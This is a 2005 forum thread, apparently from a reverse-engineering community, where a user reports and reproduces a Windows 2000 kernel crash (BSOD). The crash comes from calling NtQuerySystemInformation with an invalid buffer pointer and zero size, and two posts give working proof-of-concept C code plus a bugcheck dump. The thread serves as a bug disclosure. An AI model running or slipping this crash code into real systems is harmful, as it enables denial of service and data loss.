Results 1 to 4 of 4

Thread: How to BSOD win2k

  1. #1

    How to BSOD win2k

    By accident I've found a way to BSOD win2k from usermode pretty reliably:

    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);     // NtQuerySystemInformation
          byte* buf;
          NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
          if (NtQuerySystemInformation == 0)
                printf("Error: could't get NtQuerySystemInformation\n");
                return -1;
          // get required buffer size – BUG, should be (11, buf, 1, &size), buf should hold at least 1 initialized byte
          NtQuerySystemInformation(11, buf, 0, &size);   // ModuleInformationClass
          buf = new byte[size];
          // the real call
          dwReturn = NtQuerySystemInformation(11, buf, size, &size);
    NtQuerySystemInformation is supposed to return required buffer size if passed too small buffer - though it apparently tries to write something there even if passed size = 0

    *** Fatal System Error: 0x00000050
    Break instruction exception - code 80000003 (first chance)
    A fatal system error has occurred.
    Debugger entered on first try; Bugcheck callbacks have not been invoked.
    BugCheck 50, {cccccccc, 1, 8049301b, 0}
    Probably caused by : ntoskrnl.exe ( nt!ExpQueryModuleInformation+c3 )
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    Arg1: cccccccc, memory referenced.
    Arg2: 00000001, value 0 = read operation, 1 = write operation.
    Arg3: 8049301b, If non-zero, the instruction address which referenced the bad memory
    Arg4: 00000000, (reserved)
    XP behaves correctly though, even with uninitialized buffer and size=0.
    Vulnerant omnes, ultima necat.

  2. #2
    Administrator dELTA's Avatar
    Join Date
    Oct 2000
    Ring -1
    Blog Entries
    Hehe, cool, nice work.

  3. #3
    Well, it's not crashing anymore.. I guess I was too quick to call it "reliable"

    Edit: found one compiled executable that still "works" (crashes OS) for me, have to take a look at it

    Edit2: Finally, reproduced the crash. Sample code:

    #include <windows.h>
    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);	// NtQuerySystemInformation
    int main()
    	DWORD size;
    	NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    	NtQuerySystemInformation(11, (void*)0xcccccccc, 0, &size);
        return 0;
    Attached Files Attached Files
    Last edited by omega_red; December 13th, 2005 at 09:24.
    Vulnerant omnes, ultima necat.

  4. #4
    Nice work. You found a buffer-overflow vulnerability

Similar Threads

  1. BSOD with softice under XP DOS box
    By WaxfordSqueers in forum Tools of Our Trade (TOT) Messageboard
    Replies: 3
    Last Post: June 30th, 2009, 22:29
  2. # Syser causes BSOD
    By nezumi-lab in forum Blogs Forum
    Replies: 1
    Last Post: May 11th, 2008, 01:12
  3. Olly BSOD my PC...
    By Maximus in forum OllyDbg Support Forums
    Replies: 10
    Last Post: January 2nd, 2007, 11:56
  4. Revirgin and BSOD
    By cps530 in forum Tools of Our Trade (TOT) Messageboard
    Replies: 11
    Last Post: March 29th, 2004, 00:49
  5. Win2k -> DS 2.6 BSOD (hal.dll) HELP!?!?
    By Clandestiny in forum Tools of Our Trade (TOT) Messageboard
    Replies: 6
    Last Post: August 11th, 2002, 14:02


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts